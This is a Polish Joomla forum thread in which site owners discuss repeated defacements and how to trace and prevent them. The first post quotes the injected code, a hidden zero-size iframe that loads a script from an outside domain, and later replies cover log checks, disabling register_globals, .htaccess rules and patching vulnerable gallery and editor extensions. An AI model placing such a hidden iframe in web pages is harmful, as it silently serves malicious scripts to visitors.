Znowu włamanie
Strona 1 z 2 12 OstatniOstatni
Wyniki 1 do 10 z 13

Temat: Znowu włamanie

  1. #1
    Przeglądacz
    Dołączył
    29-06-2006
    Wpisy
    31
    Punkty
    10

    Domyślny Znowu włamanie

    Witam!
    zamiast pliku index.php umieszczono inny o zawartości:

    <!--i frame name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe--><!--iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe--><iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></i frame>

    To już kolejny raz, tylko striona inna i serwer inny.

    Czy ktoś mi podpowie jak tego dokonują hackerzy i jak się przed tym zabezpieczyć?

  2. Pani Reklamowa
    Pani Reklamowa jest aktywna
    Avatar Panny Google

    Dołączył
    19-08-2010
    Skąd
    Internet
    Postów
    milion
    Pochwał
    setki
  3. #2
    Wiarus
    Dołączył
    20-11-2007
    Wpisy
    2 924
    Punkty
    51

    Domyślny

    Poczytaj wątki w tym dziale forum a z pewnościa dowiesz się więcej na ten temat czyli co może być powodem takich "wizyt" i jak temu zapobiec.

    Oczywiscie Twoj problem moze byc troche bardziej zlozony wiec po lekturze regulaminu uzupelnij swojego posta o mozliwie jaknajwiecej informacji potrzebnych do zdiagnozowania problemu.

  4. #3
    Wiarus stasio awatar
    Dołączył
    09-01-2007
    Skąd
    Na zesłaniu na Wyspie Świętej Heleny
    Wpisy
    1 100
    Punkty
    37

    Domyślny

    witam borykam sie z czymś podobnym
    mam w każdym pliku php i html na końcu taka linijkę, u mnie włam był raczej przez zomm galery szukam łaty na 2.5.4 rc4

  5. #4
    Przeglądacz
    Dołączył
    29-06-2006
    Wpisy
    31
    Punkty
    10

    Domyślny

    U mnie włamy zdarzyły się zarówno na Joomli 1.0.11 (wiem, że czas ją zaktualizować_ jak i na joomli 1.0.13 IE utf. Strony chodzą na róznych serwerach (choć jak dotąd wszystkie to apache). Mam zainstalowane różne komponenty i moduły, które raczej się nie powtarzają. Co za licho?

  6. #5
    Wiarus
    Dołączył
    14-12-2007
    Wpisy
    2 025
    Punkty
    66

    Domyślny

    a u mnie pod blokiem zdarzyło się włamanie. jak się zabezpieczyć i kto mi się włamał? włamania - temat rzeka. Niestety, ciężko jest przypadki uogólniać. Każdy przypadek można, a nawet trzeba rozpatrywać indywidualnie. Jakie komponenty ?
    i dlaczego narzekasz na 1.0.11 że są włamy skoro wiesz że trzeba zaktualizować?

  7. #6
    Wiarus stasio awatar
    Dołączył
    09-01-2007
    Skąd
    Na zesłaniu na Wyspie Świętej Heleny
    Wpisy
    1 100
    Punkty
    37

    Domyślny

    heheh no właśnie , ja siedzie i śledzę logi serwera i daty zmiany plików...
    ale im bardzije patrze w te logi tym mniej widze... i juz sam sie zastanawiam czego szukać w nich

  8. #7
    Wiarus
    Dołączył
    20-11-2007
    Wpisy
    2 924
    Punkty
    51

    Domyślny

    Cytat Wysłane przez stasio Zobacz wiadomość
    i juz sam sie zastanawiam czego szukać w nich
    Czegoś co poda informację iż np. plik index.php z katalogu głównego Twojej Joomla został zmodyfikowany o tej i tej godzinie (masz taką info nawet w zwyklym Total commanderze +/- czasami time zone servera). W logach szukasz kto czyli jakie IP dokonalo tej zmiany. Jak nie wiesz a masz porzadny serwer - napisz do admina -> pomoze okreslic co i jak.

    Z taką wiedzą podejmujesz stosowne kroki aby zapobiec ponownym atakom. Co i jak było już omawiane w tej kategorii na forum.

  9. #8
    Wyjadacz nexus246 awatar
    Dołączył
    23-09-2005
    Wpisy
    664
    Punkty
    20

    Domyślny

    Te skrypty co podmieniają pliki to automaty, wyłącz register globals, dodaj odpowiednie wpisy do htaccess (poszukaj sobie tutaj albo na joomla.org) i będzie spokój.
    Witaminy | Ziołolecznictwo
    "Paczem" do "komentarzów" jest odpowiedni komponent.
    --
    Mój priv to nie helpdesk.

  10. #9
    Wiarus stasio awatar
    Dołączył
    09-01-2007
    Skąd
    Na zesłaniu na Wyspie Świętej Heleny
    Wpisy
    1 100
    Punkty
    37

    Domyślny

    dobra... teraz wam powiem śledztwo doprowadziło mnie co się stało
    o 22:44:41 z Ukrainy zostało wysłane zapytanie do pliku upload.php wgrany plik zip z kodem i trach do 23:08 nie było nic a (o przepraszam napisałem to głośno? to z nerwów) okazało sie ze dziura była w coppermine wiec szczęśliwym zwycięzcą konkursu na wpuszczenie wirusa okazał sie skrypt galerii , jommla nie miała z tym za wiele wspołnego :|
    jak ktoś ma coppera niech aktualizuje i poprawia go bo dzięki na...kicham na takie kłopoty :-) teraz sobie siedzę i z backupu przenoszę pliki wole to niż poprawianie wszystkich plików
    Ostanio edytowane przez nexus246 : 11-04-2008 15:55

  11. #10
    Przeglądacz
    Dołączył
    29-06-2006
    Wpisy
    31
    Punkty
    10

    Domyślny

    Ja nie mam coppermine. Za to wszędzie mam jce więc może to przez niego. Dziś wgrałem do niego łatkę. Sprawdziłem i powyłączałem register globals tam gdzie było włączone. Uzupełniłem htaccess wszystkim co znalazłem na forum. I chyba pozostaje czekać i patrzeć

Strona 1 z 2 12 OstatniOstatni

Reguły pisania

  • Nie możesz zakładać nowych tematów
  • Nie możesz dodawać wypowiedzi
  • Nie możesz dodawać załączników
  • Nie możesz poprawiać swoich postów
  •